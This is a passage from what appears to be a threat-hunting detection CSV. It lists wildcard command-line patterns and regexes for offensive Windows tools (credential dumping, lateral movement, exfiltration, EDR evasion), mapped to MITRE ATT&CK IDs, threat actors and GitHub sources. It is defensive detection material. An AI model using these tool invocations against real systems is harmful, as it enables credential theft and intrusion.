Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","4513" "*.exe -l * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a*",".{0,1000}\.exe\s\-l\s.{0,1000}\s\-c\s\{F7FD3FD6\-9994\-452D\-8DA7\-9A8FD87AEEF4\}\s\-a.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","4514" "*.exe --LDAPs --DisableSigning*",".{0,1000}\.exe\s\-\-LDAPs\s\-\-DisableSigning.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","N/A","7","7","629","81","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z","4515" "*.exe --lhost 127.0.0.1 --lport * --rhost *",".{0,1000}\.exe\s\-\-lhost\s127\.0\.0\.1\s\-\-lport\s.{0,1000}\s\-\-rhost\s.{0,1000}","offensive_tool_keyword","keywa7","The tool that bypasses the firewall's Application Based Rules and lets you connect to anywhere","T1090.001 - T1071.004 - T1071.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/keywa7/keywa7","1","0","N/A","N/A","6","1","61","9","2024-08-19T08:09:33Z","2024-08-05T15:27:26Z","4516" "*.exe -linpeas=*",".{0,1000}\.exe\s\-linpeas\=.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","4517" "*.exe --list-vulns*",".{0,1000}\.exe\s\-\-list\-vulns.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs - detect various vulnerabilities and suggest potential exploits for Privilege Escalation in Windows environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","0","N/A","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","4518" "*.exe localhost add * ""cmd.exe"" ""/c *"" *daily*",".{0,1000}\.exe\slocalhost\sadd\s.{0,1000}\s\""cmd\.exe\""\s\""\/c\s.{0,1000}\""\s.{0,1000}daily.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","4519" "*.exe localhost add * ""cmd.exe"" ""/c *"" *logon*",".{0,1000}\.exe\slocalhost\sadd\s.{0,1000}\s\""cmd\.exe\""\s\""\/c\s.{0,1000}\""\s.{0,1000}logon.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. 
- Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","4520" "*.exe localhost add * ""cmd.exe"" ""/c *"" *second*",".{0,1000}\.exe\slocalhost\sadd\s.{0,1000}\s\""cmd\.exe\""\s\""\/c\s.{0,1000}\""\s.{0,1000}second.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","4521" "*.exe localhost add * ""cmd.exe"" ""/c *"" *weekly*",".{0,1000}\.exe\slocalhost\sadd\s.{0,1000}\s\""cmd\.exe\""\s\""\/c\s.{0,1000}\""\s.{0,1000}weekly.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). 
- Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","4522" "*.exe localhost add * ""cmd.exe"" ""/c *"" *weekly*",".{0,1000}\.exe\slocalhost\sadd\s.{0,1000}\s\""cmd\.exe\""\s\""\/c\s.{0,1000}\""\s.{0,1000}weekly.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","4523" "*.exe -lolbas*",".{0,1000}\.exe\s\-lolbas.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","4524" "*.exe -m exec -c ""whoami /priv*",".{0,1000}\.exe\s\-m\sexec\s\-c\s\""whoami\s\/priv.{0,1000}","offensive_tool_keyword","PrivFu","execute process as NT SERVICE\TrustedInstaller group account","T1055","TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","TrustExec","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","4525" "*.exe -m exec -s -e S-1-5-20*",".{0,1000}\.exe\s\-m\sexec\s\-s\s\-e\sS\-1\-5\-20.{0,1000}","offensive_tool_keyword","PrivFu","execute process as NT SERVICE\TrustedInstaller group account","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","TrustExec","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","4526" "*.exe -m find -r tcb*",".{0,1000}\.exe\s\-m\sfind\s\-r\stcb.{0,1000}","offensive_tool_keyword","PrivFu","manage user right without secpol.msc","T1059 - T1078","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","UserRightsUtil","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","4527" "*.exe -m sid -l -s S-1-5-18*",".{0,1000}\.exe\s\-m\ssid\s\-l\s\-s\sS\-1\-5\-18.{0,1000}","offensive_tool_keyword","PrivFu","execute process as NT SERVICE\TrustedInstaller group account","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","TrustExec","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","4528" "*.exe machinemasterkeys*",".{0,1000}\.exe\smachinemasterkeys.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4529" "*.exe machinetriage*",".{0,1000}\.exe\smachinetriage.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential 
Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4530" "*.exe machinevaults*",".{0,1000}\.exe\smachinevaults.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4531" "*.exe masterkeys /hashes*",".{0,1000}\.exe\smasterkeys\s\/hashes.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4532" "*.exe masterkeys /hashes*",".{0,1000}\.exe\smasterkeys\s\/hashes.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4533" "*.exe masterkeys /pvk:*",".{0,1000}\.exe\smasterkeys\s\/pvk\:.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4534" "*.exe McAfeeSitelistFiles*",".{0,1000}\.exe\sMcAfeeSitelistFiles.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","4535" "*.EXE Meterpreter Reverse HTTP and HTTPS loader*",".{0,1000}\.EXE\sMeterpreter\sReverse\sHTTP\sand\sHTTPS\sloader.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","4536" "*.exe --Method ShellWindows --ComputerName * --Command *",".{0,1000}\.exe\s\-\-Method\sShellWindows\s\-\-ComputerName\s.{0,1000}\s\-\-Command\s.{0,1000}","offensive_tool_keyword","SharpCOM","DCOM Lateral Movement","T1175","TA0008","N/A","N/A","Lateral Movement","https://github.com/rvrsh3ll/SharpCOM","1","0","N/A","N/A","10","2","128","30","2019-09-16T22:52:53Z","2018-12-13T15:10:55Z","4537" "*.exe ModifiableScheduledTask*",".{0,1000}\.exe\sModifiableScheduledTask.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","4538" "*.exe ModifiableServiceBinaries*",".{0,1000}\.exe\sModifiableServiceBinaries.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","4539" "*.exe ModifiableServiceRegistryKeys*",".{0,1000}\.exe\sModifiableServiceRegistryKeys.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","4540" "*.exe ModifiableServices*",".{0,1000}\.exe\sModifiableServices.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","4541" "*.exe monitor /interval:5 /nowrap",".{0,1000}\.exe\smonitor\s\/interval\:5\s\/nowrap","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation Exploitation with Rubeus","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","4542" "*.exe NonstandardProcesses*",".{0,1000}\.exe\sNonstandardProcesses.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","4543" "*.exe ntlm cim * /m:check_pslockdown*",".{0,1000}\.exe\sntlm\scim\s.{0,1000}\s\/m\:check_pslockdown.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4544" "*.exe ntlm cim * /m:check_pslogging*",".{0,1000}\.exe\sntlm\scim\s.{0,1000}\s\/m\:check_pslogging.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4545" "*.exe ntlm cim * /m:disable_pslockdown*",".{0,1000}\.exe\sntlm\scim\s.{0,1000}\s\/m\:disable_pslockdown.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4546" "*.exe ntlm cim * /m:disable_pslogging*",".{0,1000}\.exe\sntlm\scim\s.{0,1000}\s\/m\:disable_pslogging.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - 
TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4547" "*.exe ntlm cim * /m:disable_winrm*",".{0,1000}\.exe\sntlm\scim\s.{0,1000}\s\/m\:disable_winrm.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4548" "*.exe ntlm cim * /m:enable_winrm*",".{0,1000}\.exe\sntlm\scim\s.{0,1000}\s\/m\:enable_winrm.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4549" "*.exe ntlm cim * /user:*",".{0,1000}\.exe\sntlm\scim\s.{0,1000}\s\/user\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4550" "*.exe ntlm ldap * /m:spraydata*",".{0,1000}\.exe\sntlm\sldap\s.{0,1000}\s\/m\:spraydata.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4551" "*.exe ntlm ldap * 
/password:*",".{0,1000}\.exe\sntlm\sldap\s.{0,1000}\s\/password\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4552" "*.exe ntlm reg32 * /m:check_pslockdown*",".{0,1000}\.exe\sntlm\sreg32\s.{0,1000}\s\/m\:check_pslockdown.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4553" "*.exe ntlm reg32 * /m:check_pslogging*",".{0,1000}\.exe\sntlm\sreg32\s.{0,1000}\s\/m\:check_pslogging.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4554" "*.exe ntlm reg32 * /m:disable_pslockdown*",".{0,1000}\.exe\sntlm\sreg32\s.{0,1000}\s\/m\:disable_pslockdown.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4555" "*.exe ntlm reg32 * /ntlm:*",".{0,1000}\.exe\sntlm\sreg32\s.{0,1000}\s\/ntlm\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - 
TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4556" "*.exe ntlm smb * /m:shares*",".{0,1000}\.exe\sntlm\ssmb\s.{0,1000}\s\/m\:shares.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4557" "*.exe ntlm smb * /ntlm:*",".{0,1000}\.exe\sntlm\ssmb\s.{0,1000}\s\/ntlm\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4558" "*.exe ntlm winrm * /m:assembly /p:*",".{0,1000}\.exe\sntlm\swinrm\s.{0,1000}\s\/m\:assembly\s\/p\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4559" "*.exe ntlm winrm * /m:comsvcs*",".{0,1000}\.exe\sntlm\swinrm\s.{0,1000}\s\/m\:comsvcs.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4560" "*.exe ntlm winrm * 
/m:download*",".{0,1000}\.exe\sntlm\swinrm\s.{0,1000}\s\/m\:download.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4561" "*.exe ntlm winrm * /m:exec /a:*",".{0,1000}\.exe\sntlm\swinrm\s.{0,1000}\s\/m\:exec\s\/a\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4562" "*.exe ntlm winrm * /m:secrets*",".{0,1000}\.exe\sntlm\swinrm\s.{0,1000}\s\/m\:secrets.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4563" "*.exe ntlm winrm * /m:upload*",".{0,1000}\.exe\sntlm\swinrm\s.{0,1000}\s\/m\:upload.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4564" "*.exe ntlm winrm * /password:*",".{0,1000}\.exe\sntlm\swinrm\s.{0,1000}\s\/password\:.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - 
TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4565" "*.exe NTLMSettings*",".{0,1000}\.exe\sNTLMSettings.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","4566" "*.exe OneDrive --username * --password * --filepath *\*.exe*",".{0,1000}\.exe\sOneDrive\s\-\-username\s.{0,1000}\s\-\-password\s.{0,1000}\s\-\-filepath\s.{0,1000}\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","N/A","10","2","126","37","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z","4567" "*.exe --override-file --source-file *.exe*",".{0,1000}\.exe\s\-\-override\-file\s\-\-source\-file\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","4568" "*.exe --path C:\ -r --method 
VirtualAlloc*",".{0,1000}\.exe\s\-\-path\sC\:\\\s\-r\s\-\-method\sVirtualAlloc.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","4569" "*.exe --procdump -p *",".{0,1000}\.exe\s\-\-procdump\s\-p\s.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","4572" "*.exe ProcessDLLHijack*",".{0,1000}\.exe\sProcessDLLHijack.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common 